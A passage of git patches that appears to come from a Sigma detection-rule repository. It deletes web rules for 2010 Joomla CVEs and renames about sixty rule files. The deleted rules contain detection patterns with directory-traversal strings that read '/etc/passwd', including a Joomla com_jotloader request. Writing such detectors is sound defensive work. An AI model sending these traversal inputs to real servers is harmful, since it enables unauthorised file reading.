-references:
-- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
-- https://www.exploit-db.com/exploits/15505
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /../../../../../../../../../../../../../etc/passwd
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml
deleted file mode 100644
index 9384cf9d..00000000
--- a/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-4617 exploitation attempt
-id: cc29de7e-88e9-4deb-ac0b-5072745ba6d5
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the JotLoader (com_jotloader) component
- 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory
- traversal sequences in the section parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/15791
-- https://www.cvedetails.com/cve/CVE-2010-4617
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
From 1f7d239bf9ed2f4d7d5314a3587024125b082504 Mon Sep 17 00:00:00 2001
From: pbssubhash
Date: Sun, 12 Sep 2021 18:24:35 +0530
Subject: [PATCH 0886/1367] Name change
---
 ...2010-0943_exploitation_attempt.yaml => web_cve-2010-0943.yaml} | 0
 ...2010-0944_exploitation_attempt.yaml => web_cve-2010-0944.yaml} | 0
 ...2010-0985_exploitation_attempt.yaml => web_cve-2010-0985.yaml} | 0
 ...2010-1219_exploitation_attempt.yaml => web_cve-2010-1219.yaml} | 0
 ...2010-1304_exploitation_attempt.yaml => web_cve-2010-1304.yaml} | 0
 ...2010-1305_exploitation_attempt.yaml => web_cve-2010-1305.yaml} | 0
 ...2010-1306_exploitation_attempt.yaml => web_cve-2010-1306.yaml} | 0
 ...2010-1307_exploitation_attempt.yaml => web_cve-2010-1307.yaml} | 0
 ...2010-1308_exploitation_attempt.yaml => web_cve-2010-1308.yaml} | 0
 ...2010-1312_exploitation_attempt.yaml => web_cve-2010-1312.yaml} | 0
 ...2010-1313_exploitation_attempt.yaml => web_cve-2010-1313.yaml} | 0
 ...2010-1314_exploitation_attempt.yaml => web_cve-2010-1314.yaml} | 0
 ...2010-1345_exploitation_attempt.yaml => web_cve-2010-1345.yaml} | 0
 ...2010-1353_exploitation_attempt.yaml => web_cve-2010-1353.yaml} | 0
 ...2010-1354_exploitation_attempt.yaml => web_cve-2010-1354.yaml} | 0
 ...2010-1470_exploitation_attempt.yaml => web_cve-2010-1470.yaml} | 0
 ...2010-1471_exploitation_attempt.yaml => web_cve-2010-1471.yaml} | 0
 ...2010-1472_exploitation_attempt.yaml => web_cve-2010-1472.yaml} | 0
 ...2010-1473_exploitation_attempt.yaml => web_cve-2010-1473.yaml} | 0
 ...2010-1474_exploitation_attempt.yaml => web_cve-2010-1474.yaml} | 0
 ...2010-1475_exploitation_attempt.yaml => web_cve-2010-1475.yaml} | 0
 ...2010-1476_exploitation_attempt.yaml => web_cve-2010-1476.yaml} | 0
 ...2010-1494_exploitation_attempt.yaml => web_cve-2010-1494.yaml} | 0
 ...2010-1495_exploitation_attempt.yaml => web_cve-2010-1495.yaml} | 0
 ...2010-1532_exploitation_attempt.yaml => web_cve-2010-1532.yaml} | 0
 ...2010-1533_exploitation_attempt.yaml => web_cve-2010-1533.yaml} | 0
 ...2010-1534_exploitation_attempt.yaml => web_cve-2010-1534.yaml} | 0
 ...2010-1535_exploitation_attempt.yaml => web_cve-2010-1535.yaml} | 0
 ...2010-1601_exploitation_attempt.yaml => web_cve-2010-1601.yaml} | 0
 ...2010-1602_exploitation_attempt.yaml => web_cve-2010-1602.yaml} | 0
 ...2010-1607_exploitation_attempt.yaml => web_cve-2010-1607.yaml} | 0
 ...2010-1657_exploitation_attempt.yaml => web_cve-2010-1657.yaml} | 0
 ...2010-1659_exploitation_attempt.yaml => web_cve-2010-1659.yaml} | 0
 ...2010-1714_exploitation_attempt.yaml => web_cve-2010-1714.yaml} | 0
 ...2010-1717_exploitation_attempt.yaml => web_cve-2010-1717.yaml} | 0
 ...2010-1718_exploitation_attempt.yaml => web_cve-2010-1718.yaml} | 0
 ...2010-1719_exploitation_attempt.yaml => web_cve-2010-1719.yaml} | 0
 ...2010-1722_exploitation_attempt.yaml => web_cve-2010-1722.yaml} | 0
 ...2010-1875_exploitation_attempt.yaml => web_cve-2010-1875.yaml} | 0
 ...2010-1953_exploitation_attempt.yaml => web_cve-2010-1953.yaml} | 0
 ...2010-1954_exploitation_attempt.yaml => web_cve-2010-1954.yaml} | 0
 ...2010-1955_exploitation_attempt.yaml => web_cve-2010-1955.yaml} | 0
 ...2010-1956_exploitation_attempt.yaml => web_cve-2010-1956.yaml} | 0
 ...2010-1979_exploitation_attempt.yaml => web_cve-2010-1979.yaml} | 0
 ...2010-1980_exploitation_attempt.yaml => web_cve-2010-1980.yaml} | 0
 ...2010-1981_exploitation_attempt.yaml => web_cve-2010-1981.yaml} | 0
 ...2010-1983_exploitation_attempt.yaml => web_cve-2010-1983.yaml} | 0
 ...2010-2033_exploitation_attempt.yaml => web_cve-2010-2033.yaml} | 0
 ...2010-2034_exploitation_attempt.yaml => web_cve-2010-2034.yaml} | 0
 ...2010-2035_exploitation_attempt.yaml => web_cve-2010-2035.yaml} | 0
 ...2010-2036_exploitation_attempt.yaml => web_cve-2010-2036.yaml} | 0
 ...2010-2122_exploitation_attempt.yaml => web_cve-2010-2122.yaml} | 0
 ...2010-2259_exploitation_attempt.yaml => web_cve-2010-2259.yaml} | 0
 ...2010-2307_exploitation_attempt.yaml => web_cve-2010-2307.yaml} | 0
 ...2010-2682_exploitation_attempt.yaml => web_cve-2010-2682.yaml} | 0
 ...2010-2861_exploitation_attempt.yaml => web_cve-2010-2861.yaml} | 0
 ...2010-2920_exploitation_attempt.yaml => web_cve-2010-2920.yaml} | 0
 ...2010-3426_exploitation_attempt.yaml => web_cve-2010-3426.yaml} | 0
 ...2010-4231_exploitation_attempt.yaml => web_cve-2010-4231.yaml} | 0
 ...2010-4617_exploitation_attempt.yaml => web_cve-2010-4617.yaml} | 0
 ...2010-5278_exploitation_attempt.yaml => web_cve-2010-5278.yaml} | 0
 61 files changed, 0 insertions(+), 0 deletions(-)
 rename rules/web/{web_cve-2010-0943_exploitation_attempt.yaml => web_cve-2010-0943.yaml} (100%)
 rename rules/web/{web_cve-2010-0944_exploitation_attempt.yaml => web_cve-2010-0944.yaml} (100%)
 rename rules/web/{web_cve-2010-0985_exploitation_attempt.yaml => web_cve-2010-0985.yaml} (100%)
 rename rules/web/{web_cve-2010-1219_exploitation_attempt.yaml => web_cve-2010-1219.yaml} (100%)
 rename rules/web/{web_cve-2010-1304_exploitation_attempt.yaml => web_cve-2010-1304.yaml} (100%)
 rename rules/web/{web_cve-2010-1305_exploitation_attempt.yaml => web_cve-2010-1305.yaml} (100%)
 rename rules/web/{web_cve-2010-1306_exploitation_attempt.yaml => web_cve-2010-1306.yaml} (100%)
 rename rules/web/{web_cve-2010-1307_exploitation_attempt.yaml => web_cve-2010-1307.yaml} (100%)
 rename rules/web/{web_cve-2010-1308_exploitation_attempt.yaml => web_cve-2010-1308.yaml} (100%)
 rename rules/web/{web_cve-2010-1312_exploitation_attempt.yaml => web_cve-2010-1312.yaml} (100%)
 rename rules/web/{web_cve-2010-1313_exploitation_attempt.yaml => web_cve-2010-1313.yaml} (100%)
 rename rules/web/{web_cve-2010-1314_exploitation_attempt.yaml => web_cve-2010-1314.yaml} (100%)
 rename rules/web/{web_cve-2010-1345_exploitation_attempt.yaml => web_cve-2010-1345.yaml} (100%)
 rename rules/web/{web_cve-2010-1353_exploitation_attempt.yaml => web_cve-2010-1353.yaml} (100%)
 rename rules/web/{web_cve-2010-1354_exploitation_attempt.yaml => web_cve-2010-1354.yaml} (100%)
 rename rules/web/{web_cve-2010-1470_exploitation_attempt.yaml => web_cve-2010-1470.yaml} (100%)
 rename rules/web/{web_cve-2010-1471_exploitation_attempt.yaml => web_cve-2010-1471.yaml} (100%)
 rename rules/web/{web_cve-2010-1472_exploitation_attempt.yaml => web_cve-2010-1472.yaml} (100%)
 rename rules/web/{web_cve-2010-1473_exploitation_attempt.yaml => web_cve-2010-1473.yaml} (100%)
 rename rules/web/{web_cve-2010-1474_exploitation_attempt.yaml => web_cve-2010-1474.yaml} (100%)
 rename rules/web/{web_cve-2010-1475_exploitation_attempt.yaml => web_cve-2010-1475.yaml} (100%)
 rename rules/web/{web_cve-2010-1476_exploitation_attempt.yaml => web_cve-2010-1476.yaml} (100%)
 rename rules/web/{web_cve-2010-1494_exploitation_attempt.yaml => web_cve-2010-1494.yaml} (100%)
 rename rules/web/{web_cve-2010-1495_exploitation_attempt.yaml => web_cve-2010-1495.yaml} (100%)
 rename rules/web/{web_cve-2010-1532_exploitation_attempt.yaml => web_cve-2010-1532.yaml} (100%)
 rename rules/web/{web_cve-2010-1533_exploitation_attempt.yaml => web_cve-2010-1533.yaml} (100%)
 rename rules/web/{web_cve-2010-1534_exploitation_attempt.yaml => web_cve-2010-1534.yaml} (100%)
 rename rules/web/{web_cve-2010-1535_exploitation_attempt.yaml => web_cve-2010-1535.yaml} (100%)
 rename rules/web/{web_cve-2010-1601_exploitation_attempt.yaml => web_cve-2010-1601.yaml} (100%)
 rename rules/web/{web_cve-2010-1602_exploitation_attempt.yaml => web_cve-2010-1602.yaml} (100%)
 rename rules/web/{web_cve-2010-1607_exploitation_attempt.yaml => web_cve-2010-1607.yaml} (100%)
 rename rules/web/{web_cve-2010-1657_exploitation_attempt.yaml => web_cve-2010-1657.yaml} (100%)
 rename rules/web/{web_cve-2010-1659_exploitation_attempt.yaml => web_cve-2010-1659.yaml} (100%)
 rename rules/web/{web_cve-2010-1714_exploitation_attempt.yaml => web_cve-2010-1714.yaml} (100%)
 rename rules/web/{web_cve-2010-1717_exploitation_attempt.yaml => web_cve-2010-1717.yaml} (100%)
 rename rules/web/{web_cve-2010-1718_exploitation_attempt.yaml => web_cve-2010-1718.yaml} (100%)
 rename rules/web/{web_cve-2010-1719_exploitation_attempt.yaml => web_cve-2010-1719.yaml} (100%)
 rename rules/web/{web_cve-2010-1722_exploitation_attempt.yaml => web_cve-2010-1722.yaml} (100%)
 rename rules/web/{web_cve-2010-1875_exploitation_attempt.yaml => web_cve-2010-1875.yaml} (100%)
 rename rules/web/{web_cve-2010-1953_exploitation_attempt.yaml => web_cve-2010-1953.yaml} (100%)
 rename rules/web/{web_cve-2010-1954_exploitation_attempt.yaml => web_cve-2010-1954.yaml} (100%)
 rename rules/web/{web_cve-2010-1955_exploitation_attempt.yaml => web_cve-2010-1955.yaml} (100%)
 rename rules/web/{web_cve-2010-1956_exploitation_attempt.yaml => web_cve-2010-1956.yaml} (100%)
 rename rules/web/{web_cve-2010-1979_exploitation_attempt.yaml => web_cve-2010-1979.yaml} (100%)
 rename rules/web/{web_cve-2010-1980_exploitation_attempt.yaml => web_cve-2010-1980.yaml} (100%)
 rename rules/web/{web_cve-2010-1981_exploitation_attempt.yaml => web_cve-2010-1981.yaml} (100%)
 rename rules/web/{web_cve-2010-1983_exploitation_attempt.yaml => web_cve-2010-1983.yaml} (100%)
 rename rules/web/{web_cve-2010-2033_exploitation_attempt.yaml => web_cve-2010-2033.yaml} (100%)
 rename rules/web/{web_cve-2010-2034_exploitation_attempt.yaml => web_cve-2010-2034.yaml} (100%)
 rename rules/web/{web_cve-2010-2035_exploitation_attempt.yaml => web_cve-2010-2035.yaml} (100%)
 rename rules/web/{web_cve-2010-2036_exploitation_attempt.yaml => web_cve-2010-2036.yaml} (100%)
 rename rules/web/{web_cve-2010-2122_exploitation_attempt.yaml => web_cve-2010-2122.yaml} (100%)
 rename rules/web/{web_cve-2010-2259_exploitation_attempt.yaml => web_cve-2010-2259.yaml} (100%)
 rename rules/web/{web_cve-2010-2307_exploitation_attempt.yaml => web_cve-2010-2307.yaml} (100%)
 rename rules/web/{web_cve-2010-2682_exploitation_attempt.yaml => web_cve-2010-2682.yaml} (100%)
 rename rules/web/{web_cve-2010-2861_exploitation_attempt.yaml => web_cve-2010-2861.yaml} (100%)
 rename rules/web/{web_cve-2010-2920_exploitation_attempt.yaml => web_cve-2010-2920.yaml} (100%)
 rename rules/web/{web_cve-2010-3426_exploitation_attempt.yaml => web_cve-2010-3426.yaml} (100%)
 rename rules/web/{web_cve-2010-4231_exploitation_attempt.yaml => web_cve-2010-4231.yaml} (100%)
 rename rules/web/{web_cve-2010-4617_exploitation_attempt.yaml => web_cve-2010-4617.yaml} (100%)
 rename rules/web/{web_cve-2010-5278_exploitation_attempt.yaml => web_cve-2010-5278.yaml} (100%)
diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve-2010-0943.yaml
similarity index 100%
rename from rules/web/web_cve-2010-0943_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-0943.yaml
diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve-2010-0944.yaml
similarity index 100%
rename from rules/web/web_cve-2010-0944_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-0944.yaml
diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yaml b/rules/web/web_cve-2010-0985.yaml
similarity index 100%
rename from rules/web/web_cve-2010-0985_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-0985.yaml
diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yaml b/rules/web/web_cve-2010-1219.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1219_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1219.yaml
diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yaml b/rules/web/web_cve-2010-1304.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1304_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1304.yaml
diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yaml b/rules/web/web_cve-2010-1305.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1305_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1305.yaml
diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve-2010-1306.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1306_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1306.yaml
diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yaml b/rules/web/web_cve-2010-1307.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1307_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1307.yaml
diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yaml b/rules/web/web_cve-2010-1308.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1308_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1308.yaml
diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yaml b/rules/web/web_cve-2010-1312.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1312_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1312.yaml
diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yaml b/rules/web/web_cve-2010-1313.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1313_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1313.yaml
diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve-2010-1314.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1314_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1314.yaml
diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve-2010-1345.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1345_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1345.yaml
diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve-2010-1353.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1353_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1353.yaml
diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yaml b/rules/web/web_cve-2010-1354.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1354_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1354.yaml
diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yaml b/rules/web/web_cve-2010-1470.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1470_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1470.yaml
diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yaml b/rules/web/web_cve-2010-1471.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1471_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1471.yaml
diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yaml b/rules/web/web_cve-2010-1472.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1472_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1472.yaml
diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yaml b/rules/web/web_cve-2010-1473.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1473_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1473.yaml
diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve-2010-1474.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1474_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1474.yaml
diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve-2010-1475.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1475_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1475.yaml
diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yaml b/rules/web/web_cve-2010-1476.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1476_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1476.yaml
diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yaml b/rules/web/web_cve-2010-1494.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1494_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1494.yaml
diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve-2010-1495.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1495_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1495.yaml
diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve-2010-1532.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1532_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1532.yaml
diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve-2010-1533.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1533_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1533.yaml
diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yaml b/rules/web/web_cve-2010-1534.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1534_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1534.yaml
diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve-2010-1535.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1535_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1535.yaml
diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yaml b/rules/web/web_cve-2010-1601.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1601_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1601.yaml
diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve-2010-1602.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1602_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1602.yaml
diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yaml b/rules/web/web_cve-2010-1607.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1607_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1607.yaml
diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve-2010-1657.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1657_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1657.yaml
diff --git a/rules/web/web_cve-2010-1659_exploitation_attempt.yaml b/rules/web/web_cve-2010-1659.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1659_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1659.yaml
diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yaml b/rules/web/web_cve-2010-1714.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1714_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1714.yaml
diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yaml b/rules/web/web_cve-2010-1717.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1717_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1717.yaml
diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve-2010-1718.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1718_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1718.yaml
diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yaml b/rules/web/web_cve-2010-1719.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1719_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1719.yaml
diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve-2010-1722.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1722_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1722.yaml
diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve-2010-1875.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1875_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1875.yaml
diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve-2010-1953.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1953_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1953.yaml
diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve-2010-1954.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1954_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1954.yaml
diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve-2010-1955.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1955_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1955.yaml
diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yaml b/rules/web/web_cve-2010-1956.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1956_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1956.yaml
diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve-2010-1979.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1979_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1979.yaml
diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yaml b/rules/web/web_cve-2010-1980.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1980_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1980.yaml
diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yaml b/rules/web/web_cve-2010-1981.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1981_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1981.yaml
diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve-2010-1983.yaml
similarity index 100%
rename from rules/web/web_cve-2010-1983_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1983.yaml
diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve-2010-2033.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2033_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2033.yaml
diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yaml b/rules/web/web_cve-2010-2034.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2034_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2034.yaml
diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yaml b/rules/web/web_cve-2010-2035.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2035_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2035.yaml
diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve-2010-2036.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2036_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2036.yaml
diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yaml b/rules/web/web_cve-2010-2122.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2122_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2122.yaml
diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve-2010-2259.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2259_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2259.yaml
diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve-2010-2307.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2307_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2307.yaml
diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve-2010-2682.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2682_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2682.yaml
diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve-2010-2861.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2861_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2861.yaml
diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yaml b/rules/web/web_cve-2010-2920.yaml
similarity index 100%
rename from rules/web/web_cve-2010-2920_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-2920.yaml
diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve-2010-3426.yaml
similarity index 100%
rename from rules/web/web_cve-2010-3426_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-3426.yaml
diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve-2010-4231.yaml
similarity index 100%
rename from rules/web/web_cve-2010-4231_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-4231.yaml
diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve-2010-4617.yaml
similarity index 100%
rename from rules/web/web_cve-2010-4617_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-4617.yaml
diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve-2010-5278.yaml
similarity index 100%
rename from rules/web/web_cve-2010-5278_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-5278.yaml
From 5d654c45187baefe4d0cb5f70400b6c2835dac76 Mon Sep 17 00:00:00 2001
From: pbssubhash
Date: Sun, 12 Sep 2021 18:36:20 +0530
Subject: [PATCH 0887/1367] Changing title to camelcase
---
 ...-0943.yaml => web_cve-2010-0943_exploitation_attempt.yaml} | 4 ++--
 ...-0944.yaml => web_cve-2010-0944_exploitation_attempt.yaml} | 4 ++--
 ...-0985.yaml => web_cve-2010-0985_exploitation_attempt.yaml} | 4 ++--
 ...-1219.yaml => web_cve-2010-1219_exploitation_attempt.yaml} | 4 ++--
 ...-1304.yaml => web_cve-2010-1304_exploitation_attempt.yaml} | 4 ++--
 ...-1305.yaml => web_cve-2010-1305_exploitation_attempt.yaml} | 4 ++--
 ...-1306.yaml => web_cve-2010-1306_exploitation_attempt.yaml} | 4 ++--
 ...-1307.yaml => web_cve-2010-1307_exploitation_attempt.yaml} | 4 ++--
 ...-1308.yaml => web_cve-2010-1308_exploitation_attempt.yaml} | 4 ++--
 ...-1312.yaml => web_cve-2010-1312_exploitation_attempt.yaml} | 4 ++--
 ...-1313.yaml => web_cve-2010-1313_exploitation_attempt.yaml} | 4 ++--
 ...-1314.yaml => web_cve-2010-1314_exploitation_attempt.yaml} | 4 ++--
 ...-1345.yaml => web_cve-2010-1345_exploitation_attempt.yaml} | 4 ++--
 ...-1353.yaml => web_cve-2010-1353_exploitation_attempt.yaml} | 4 ++--
 ...-1354.yaml => web_cve-2010-1354_exploitation_attempt.yaml} | 4 ++--
 ...-1470.yaml => web_cve-2010-1470_exploitation_attempt.yaml} | 4 ++--
 ...-1471.yaml => web_cve-2010-1471_exploitation_attempt.yaml} | 4 ++--
 ...-1472.yaml => web_cve-2010-1472_exploitation_attempt.yaml} | 4 ++--
 ...-1473.yaml => web_cve-2010-1473_exploitation_attempt.yaml} | 4 ++--
 ...-1474.yaml => web_cve-2010-1474_exploitation_attempt.yaml} | 4 ++--
 ...-1475.yaml => web_cve-2010-1475_exploitation_attempt.yaml} | 4 ++--
 ...-1476.yaml => web_cve-2010-1476_exploitation_attempt.yaml} | 4 ++--
 ...-1494.yaml => web_cve-2010-1494_exploitation_attempt.yaml} | 4 ++--
